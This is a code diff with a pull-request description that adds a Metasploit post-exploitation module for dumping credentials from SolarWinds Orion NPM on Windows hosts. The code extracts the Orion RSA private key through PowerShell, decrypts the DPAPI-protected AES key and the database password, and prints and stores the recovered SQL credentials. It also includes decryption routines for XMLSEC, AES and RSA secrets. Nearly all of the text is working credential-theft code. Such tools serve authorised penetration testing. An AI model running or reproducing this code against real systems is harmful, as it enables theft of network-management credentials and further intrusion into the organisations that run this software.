+      orion_cert_thumbprint = datastore['CERT_SHA1'].upcase
+    else
+      cmd_str = "(Get-ChildItem -Path Cert:\\LocalMachine\\My | Where-Object {$_.Subject.ToLower() -eq 'cn=solarwinds-orion'}).Thumbprint"
+      orion_cert_thumbprint = psh_exec(cmd_str).upcase
+    end
+    unless orion_cert_thumbprint.match?(/^[0-9A-F]+$/i)
+      print_error('Unable to locate SolarWinds Orion SSL certificate in LocalMachine certificate store')
+      return false
+    end
+    vprint_good("Found SolarWinds Orion RSA private key in x509 certificate with SHA1 thumbprint #{orion_cert_thumbprint}")
+    cmd_str = "[Convert]::ToBase64String((
+      [System.Security.Cryptography.X509Certificates.RSACertificateExtensions]::GetRSAPrivateKey((
+      Get-ChildItem -Path Cert:\\LocalMachine\\My\\#{orion_cert_thumbprint})).Key.Export(
+      [System.Security.Cryptography.CngKeyBlobFormat]::Pkcs8PrivateBlob)))"
+    orion_cert_key = psh_exec(cmd_str)
+    unless orion_cert_key.match?(%r{^[-A-Za-z0-9+/]*={0,3}$})
+      print_error("Unable to extract RSA private key for Orion x509 certificate with SHA1 thumbprint #{orion_cert_thumbprint}")
+      return false
+    end
+    key_b64 = orion_cert_key.scan(/.{1,64}/).join("\n")
+    key_pem = "-----BEGIN PRIVATE KEY-----\n#{key_b64}\n-----END PRIVATE KEY-----"
+    @orion_rsa_key = OpenSSL::PKey::RSA.new(key_pem)
+    print_good("Extracted SolarWinds Orion RSA private key for LocalMachine certificate with SHA1 thumbprint #{orion_cert_thumbprint}")
+    p = store_loot('orionssl', 'x-pem-file', rhost, @orion_rsa_key.to_pem.to_s, 'solarwinds-orion.key', 'SolarWinds Orion RSA Key')
+    print_good("SolarWinds Orion RSA Key: #{p}")
+    nil
+  rescue OpenSSL::PKey::PKeyError
+    print_error('Failure during extract of PKCS#1 RSA private key')
+    return false
+  end
+
+  def init_orion_encryption
+    print_status('Init SolarWinds Crypto ...')
+    if datastore['AES_KEY']
+      unless datastore['AES_KEY'].match?(/^[0-9a-f]+$/i) && datastore['AES_KEY'].length == 64
+        print_error('Provided AES key is not valid 256-bit / 64-byte hexidecimal data')
+        return false
+      end
+      @orion_aes_key_hex = datastore['AES_KEY']
+      @orion_aes_key = [datastore['AES_KEY']].pack('H*')
+    else
+      print_status('Decrypt SolarWinds CryptoHelper Keystorage ...')
+      orion_enc_config_file = "#{get_env('PROGRAMDATA')}\\SolarWinds\\Keystorage\\CryptoHelper\\default.dat"
+      vprint_status('CryptoHelper Keystorage file path:')
+      vprint_status("\t#{orion_enc_config_file}")
+      return false unless (orion_enc_conf_bytes = read_config_file(orion_enc_config_file))
+
+      key_len = orion_enc_conf_bytes[4..7].unpack('l*').first.to_i
+      key_hex_encrypted = orion_enc_conf_bytes[8..key_len + 8].unpack('H*').first.to_s.upcase
+      orion_enc_conf_b64 = ::Base64.strict_encode64([key_hex_encrypted].pack('H*'))
+      @orion_aes_key = ::Base64.strict_decode64(dpapi_decrypt(orion_enc_conf_b64, nil))
+      @orion_aes_key_hex = @orion_aes_key.unpack('H*').first.to_s.upcase
+    end
+    print_good('Orion AES Encryption Key')
+    print_good("\tHEX: #{@orion_aes_key_hex}")
+    get_orion_certificate
+    unless @orion_rsa_key
+      print_warning('Unable to locate SolarWinds encryption certificate - secrets encrypted with RSA will not be decrypted')
+    end
+    true
+  end
+
+  def init_orion_db(orion_path)
+    if datastore['MSSQL_INSTANCE'] && datastore['MSSQL_DB']
+      print_status('MSSQL_INSTANCE and MSSQL_DB advanced options set, connect to SQL using SSPI')
+      db_instance_path = datastore['MSSQL_INSTANCE']
+      db_name = datastore['MSSQL_DB']
+      db_auth = 'true'
+    else
+      print_status('Decrypt SWNetPerfMon.DB ...')
+      orion_db_config_file = orion_path + 'SWNetPerfMon.DB'
+      vprint_status('SWNetPerfMon.DB file path:')
+      vprint_status("\t#{orion_db_config_file}")
+      unless (db_conf = get_orion_database_config(read_config_file(orion_db_config_file)))
+        print_error("Error reading database configuration file #{orion_db_config_file}")
+        return false
+      end
+      db_instance_path = db_conf['DATA SOURCE']
+      db_name = db_conf['INITIAL CATALOG']
+      db_user = db_conf['USER ID']
+      db_pass_enc = db_conf['ENCRYPTED.PASSWORD']
+      if db_pass_enc.nil?
+        db_pass = nil
+      else
+        # Because the db_conf hash was created by split('='), Base64 values will lose their padding if they had any.
+        # .NET [System.Convert] requires Base64 input to be strictly RFC 4648 compliant, so we must manually pad
+        db_pass = ::Base64.strict_decode64(dpapi_decrypt(b64_pad(db_pass_enc.gsub('"', '')), 'AgABAgADAAk=')) # static entropy
+      end
+      db_auth = db_conf['INTEGRATED SECURITY']
+      if db_instance_path.nil? || db_name.nil?
+        print_error("Failed to recover database parameters from #{orion_db_config_file}")
+        return false
+      end
+    end
+    @orion_db_instance_path = db_instance_path
+    @orion_db_name = db_name
+    @orion_db_integrated_auth = false
+    print_good('SolarWinds Orion SQL Database Connection Configuration:')
+    print_good("\tInstance Name: #{@orion_db_instance_path}")
+    print_good("\tDatabase Name: #{@orion_db_name}")
+    if !db_auth.nil?
+      if db_auth.downcase == 'true' || db_auth.downcase == 'sspi'
+        @orion_db_integrated_auth = true
+        print_good("\tDatabase User: (Windows Integrated)")
+        print_warning('The database uses Windows authentication')
+        print_warning('Session identity must have access to the SQL server instance to proceed')
+      end
+    elsif !db_user.nil? && !db_pass.nil?
+      @orion_db_user = db_user
+      @orion_db_pass = db_pass
+      extra_service_data = {
+        address: Rex::Socket.getaddress(rhost),
+        port: 1433,
+        service_name: 'mssql',
+        protocol: 'tcp',
+        workspace_id: myworkspace_id,
+        module_fullname: fullname,
+        origin_type: :service,
+        realm_key: Metasploit::Model::Realm::Key::WILDCARD,
+        realm_value: @orion_db_instance_path
+      }
+      store_valid_credential(user: @orion_db_user, private: @orion_db_pass, service_data: extra_service_data)
+      print_good("\tDatabase User: #{@orion_db_user}")
+      print_good("\tDatabase Pass: #{@orion_db_pass}")
+    else
+      print_error("Could not extract SQL login information from #{orion_db_config_file}")
+      return false
+    end
+    true
+  end
+
+  def get_orion_database_config(db_conf_bytes)
+    res = {}
+    unless (db_str = get_orion_database_string(db_conf_bytes))
+      print_error('Could not extract ConnectionString from binary stream')
+      return false
+    end
+    db_connection_elements = db_str.split(';')
+    db_connection_elements.each do |element|
+      pair = element.to_s.split('=')
+      k = pair[0]
+      v = pair[1]
+      res[k.upcase] = v
+    end
+    res
+  rescue StandardError => e
+    vprint_error("Exception in #{__method__}: #{e.message}")
+    return false
+  end
+
+  def get_orion_database_string(plaintext_conf)
+    return false unless plaintext_conf.match?(/ConnectionString/i)
+
+    working_offset = plaintext_conf.index(/ConnectionString/i) + 17
+    working_bytes = []
+    loop do
+      next_char = plaintext_conf[working_offset, 1]
+      break if next_char == "\n"
+
+      working_bytes << next_char
+      working_offset += 1
+    end
+    working_bytes.join
+  end
+
+  def orion_secret_decrypt(ciphertext)
+    if ciphertext.start_with?('<') # This is XMLSEC
+      unless @orion_rsa_key
+        print_warning('RSA key unavailable, cannot decrypt XMLSEC ciphertext')
+        vprint_warning("Ciphertext: #{ciphertext}")
+        return false
+      end
+      xmldoc = Nokogiri::XML(ciphertext) do |config|
+        config.options = Nokogiri::XML::ParseOptions::STRICT | Nokogiri::XML::ParseOptions::NONET
+      end
+      return false unless xmldoc
+
+      xmldoc.remove_namespaces!
+      key_b64 = xmldoc.at_xpath('/EncryptedData/KeyInfo/EncryptedKey/CipherData/CipherValue').text.delete("\000")
+      encrypted_bytes = ::Base64.strict_decode64(xmldoc.at_xpath('/EncryptedData/CipherData/CipherValue').text.delete("\000"))
+      item_key = @orion_rsa_key.decrypt(::Base64.strict_decode64(key_b64))
+      iv = encrypted_bytes[0..15]
+      ciphertext = encrypted_bytes[16..]
+      if (secret_plaintext = aes_cbc_decrypt(ciphertext, item_key, iv))
+        secret_plaintext = secret_plaintext.delete("\000")
+        secret_method = 'XMLSEC'
+      end
+    elsif ciphertext.start_with?('-') # This is AES-256
+      encrypted_bytes = ::Base64.strict_decode64(ciphertext.split('-enc-')[1].split('-')[1])
+      iv = encrypted_bytes[0..15]
+      ciphertext = encrypted_bytes[16..]
+      secret_plaintext = aes_cbc_decrypt(ciphertext, @orion_aes_key, iv)
+      secret_method = 'AES'
+    elsif ciphertext.match?(%r{^[-A-Za-z0-9+/]*={0,3}$}) # This is RSA
+      unless @orion_rsa_key
+        print_warning('RSA key unavailable, cannot decrypt RSA encrypted ciphertext')
+        vprint_warning("Ciphertext: #{ciphertext}")
+        return false
+      end
+      secret_plaintext = @orion_rsa_key.decrypt(::Base64.strict_decode64(ciphertext.to_s))
+      secret_method = 'RSA'
+    else # This is something we've never seen before
+      print_error('Could not determine encryption type, unable to decrypt')
+      vprint_error("Ciphertext: #{ciphertext}")
+    end
+    if secret_plaintext && secret_method
+      res = { 'Plaintext' => secret_plaintext.delete("\000"), 'Method' => secret_method }
+    else
+      res = nil
+    end
+    return res
+  rescue ArgumentError
+    return false
+  end
+
+  def aes_cbc_decrypt(ciphertext_bytes, aes_key, aes_iv)
+    return false unless aes_iv.length == 16
+
+    case aes_key.length
+    when 16
+      decipher = OpenSSL::Cipher.new('aes-128-cbc')
+    when 32
+      decipher = OpenSSL::Cipher.new('aes-256-cbc')
+    else
+      return false
+    end
+    decipher.decrypt
+    decipher.key = aes_key
+    decipher.iv = aes_iv
+    decipher.padding = 1
+    decipher.update(ciphertext_bytes) + decipher.final
+  rescue OpenSSL::Cipher::CipherError
+    return false
+  end
+
+  def dpapi_decrypt(b64, entropy)
+    unless b64.match?(%r{^[-A-Za-z0-9+/]*={0,3}$})
+      print_error('DPAPI decrypt: invalid Base64 ciphertext')
+      return nil
+    end
+    if entropy
+      unless entropy.match?(%r{^[-A-Za-z0-9+/]*={0,3}$})
+        print_error('DPAPI decrypt: invalid Base64 entropy value')
+        return nil
+      end
+      unprotect_param = "[Convert]::FromBase64String('#{entropy}')"
+    else
+      unprotect_param = '$Null'
+    end
+    cmd_str = "Add-Type -AssemblyName System.Security;[Convert]::ToBase64String([Security.Cryptography.ProtectedData]::Unprotect([Convert]::FromBase64String('#{b64}'), #{unprotect_param}, 'LocalMachine'))"
+    plaintext = psh_exec(cmd_str)
+    unless plaintext.match?(%r{^[-A-Za-z0-9+/]*={0,3}$})
+      print_error('Bad DPAPI decrypt')
+      vprint_error("Ciphertext: #{b64}")
+      return nil
+    end
+    plaintext
+  end
+
+  def b64_pad(b64)
+    ::Base64.strict_encode64(::Base64.decode64(b64))
+  end
+end

--- a/modules/post/windows/gather/credentials/solarwinds_orion_dump.rb
+++ b/modules/post/windows/gather/credentials/solarwinds_orion_dump.rb
@@ -19,9 +19,9 @@ class MetasploitModule < Msf::Post
         info,
         'Name' => 'SolarWinds Orion Secrets Dump',
         'Description' => %q{
-          This module exports and decrypts credentials from SolarWindows Orion Network
+          This module exports and decrypts credentials from SolarWinds Orion Network
           Performance Monitor (NPM) to a CSV file; it is intended as a post-exploitation
-          module for Windows hosts with SolarWindows Orion NPM installed. The module
+          module for Windows hosts with SolarWinds Orion NPM installed. The module
           supports decryption of AES-256, RSA, and XMLSEC secrets. Separate actions for
           extraction and decryption of the data are provided to allow session migration
           during execution in order to log in to the SQL database using SSPI. Tested on


### PR DESCRIPTION
Post module for extracting encrypted credentials from SolarWinds Orion NPM, tested on the 2020-2022 versions of the product in various configurations. This is basically an MSF/Ruby port of the C# utility SolarFlare:

[](https://malicious.link/post/2020/solarflare-release-password-dumper-for-solarwinds-orion/)

This should work on an out-of-box install of SolarWinds Orion with embedded SQL, but YMMV on instances where Orion is configured to use an external SQL server. The module requires sqlcmd to be available on the system to do data extraction, which may not be installed depending on the Orion deployment type - in those cases the module can take properly formatted CSV output acquired out-of-band and perform decryption that way. I tried to stick with the conventions picked up so far through various PRs to (hopefully) minimize everybody's review effort.